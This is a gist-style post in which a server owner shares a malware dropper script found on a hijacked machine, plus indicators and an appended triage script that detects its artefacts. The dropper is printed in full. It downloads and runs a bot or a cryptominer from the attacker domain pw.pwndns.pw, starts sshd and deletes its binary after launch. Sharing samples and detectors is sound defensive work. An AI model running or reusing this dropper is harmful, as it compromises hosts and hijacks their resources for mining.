@Bharat-B
Created December 3, 2023 21:09
Found a script running on my server, which was hijacked; this script was left on it.
#!/bin/sh
domain="pw.pwndns.pw"
root=$(id -u)
ARCH=$(uname -m)
if which curl > /dev/null 2>&1; then
dl="curl --fail --silent --connect-timeout 5 --max-time 10 --retry 1 -o"
read="curl --fail --silent --connect-timeout 5 --max-time 10 --retry 1"
elif which url > /dev/null 2>&1; then
dl="url --fail --silent --connect-timeout 5 --max-time 10 --retry 1 -o"
read="url --fail --silent --connect-timeout 5 --max-time 10 --retry 1"
elif which get > /dev/null 2>&1; then
dl="get -q --connect-timeout 5 --timeout 10 --tries 2 -O"
read="get -q --connect-timeout 5 --timeout 10 --tries 2 -O-"
elif which wget > /dev/null 2>&1; then
dl="wget -q --connect-timeout 5 --timeout 10 --tries 2 -O"
read="wget -q --connect-timeout 5 --timeout 10 --tries 2 -O-"
else
dl=""
read=""
fi
myip=$($read http://$domain/?ip)
servers=$($read http://$domain/servers/server.txt | grep $myip | wc -l)
if [ "$servers" = "1" ]; then
pid=$(ps x | grep -v -e grep -e R | grep -e "/usr/sbin/ddr" -e "ddrirc" -e "sshd$" | awk {'print $1'})
if [ -z "$pid" ]; then
if [ "$root" = "0" ]; then
service ssh start
service sshd start
/etc/init.d/sshd start
fi
cd /dev/shm || cd /tmp ; rm -rf -- $ARCH $ARCH* .$ARCH* -bash; $dl -bash http://$domain/bots/$ARCH ; chmod +x -- -bash ; ./-bash ; rm -rf -- -bash -bash* .-bash*
# else
# ps x | grep -v -e grep -e R | grep -e "/usr/sbin/ddr" -e "ddrirc" -e "sshd$" | awk {'print $1'} | while read -r p; do kill -9 "$p"; done
# rm -rf /tmp/.ddr
fi
else
ips=$(host xmr-rx0.pwndns.pw | awk {'print $4'} | while read -r ip; do echo " -e $ip ";done)
ips="$ips -e 185.45.192.135"
ssips=$(ss -np | grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' | sort | uniq | grep $ips)
if [ -z "$ssips" ]; then
cd /var/tmp/ || cd /tmp/ ; rm -rf -- $ARCH $ARCH* .$ARCH* -bash ; $dl -bash http://$domain/miners/$ARCH ; chmod +x -- -bash ; ./-bash -c -k -dp 443 -tls -p 443 -tls -dp 3333 -p 3333 -d; rm -rf -- -bash .$ARCH* $ARCH*
fi
fi

Bharat-B commented Dec 3, 2023

Also look for the following.

crondr mcrondr
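The dropper above and the author's follow-up comment give several concrete indicators (the `/usr/sbin/ddr` and `ddrirc` process names, a binary literally called `-bash` run from `/dev/shm`, `/tmp` or `/var/tmp`, the `/tmp/.ddr` path, the hardcoded peer `185.45.192.135`, and the `crondr`/`mcrondr` names). As an added triage example that is not part of the gist, this POSIX sh helper checks `ps`/`ss` output and the drop directories for them; the function names and the sample `ps` listing are constructed here, and the pattern deliberately does not flag an ordinary login shell, which `ps` also shows as `-bash`.

```shell
#!/bin/sh
# Added triage helper, not part of the gist. It looks for the artefacts the
# dropper above leaves behind, using only strings visible on this page:
# process names /usr/sbin/ddr and ddrirc, a binary literally named "-bash"
# launched from /dev/shm, /tmp or /var/tmp, the crondr/mcrondr names from the
# author's comment, the /tmp/.ddr directory, and the hardcoded peer IP.
# A login shell shows up in ps as a bare "-bash" (no path); that must NOT match.

PROC_PATTERN='(/usr/sbin/ddr|ddrirc|(^|[[:space:]])(\./|/dev/shm/|/tmp/|/var/tmp/)-bash([[:space:]]|$)|(^|[[:space:]/])m?crondr([[:space:]]|$))'
PEER_IP='185\.45\.192\.135'

# stdin: "ps ax" output. Prints suspicious lines; exit 0 if any matched.
scan_ps() {
    grep -v ' grep ' | grep -E -- "$PROC_PATTERN"
}

# stdin: "ss -np" output. Prints sockets talking to the hardcoded peer.
scan_conns() {
    grep -E -- "$PEER_IP"
}

# args: directories. Lists dropper artefacts directly inside them; exit 0 if any.
scan_dirs() {
    for d in "$@"; do
        [ -d "$d" ] || continue
        find "$d" -maxdepth 1 \( -name '[-]bash' -o -name '.ddr' \
            -o -name 'crondr' -o -name 'mcrondr' \) 2>/dev/null
    done | grep .
}

# Constructed sample listing (not captured from a real host): a legitimate
# login shell ("-bash") and one real hit (the miner started as ./-bash).
SAMPLE_PS='  PID TTY      STAT   TIME COMMAND
  812 ?        Ss     0:00 /usr/sbin/sshd -D
 1904 pts/0    Ss     0:00 -bash
 2210 ?        Sl     3:12 ./-bash -c -k -dp 443 -tls -p 443 -tls -dp 3333 -p 3333 -d'

echo "== constructed sample =="
printf '%s\n' "$SAMPLE_PS" | scan_ps

# Live mode: run against this host (needs procps and iproute2 installed).
if [ "${1:-}" = "--live" ]; then
    ps ax | scan_ps || echo "ps: no indicator"
    ss -np 2>/dev/null | scan_conns || echo "ss: no indicator"
    scan_dirs /dev/shm /tmp /var/tmp || echo "dirs: no indicator"
fi
```

Run it with `--live` to check the current host; a hit from `scan_dirs` or `scan_conns` is a stronger signal than the process check alone, since the dropper deletes its binary after launch.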
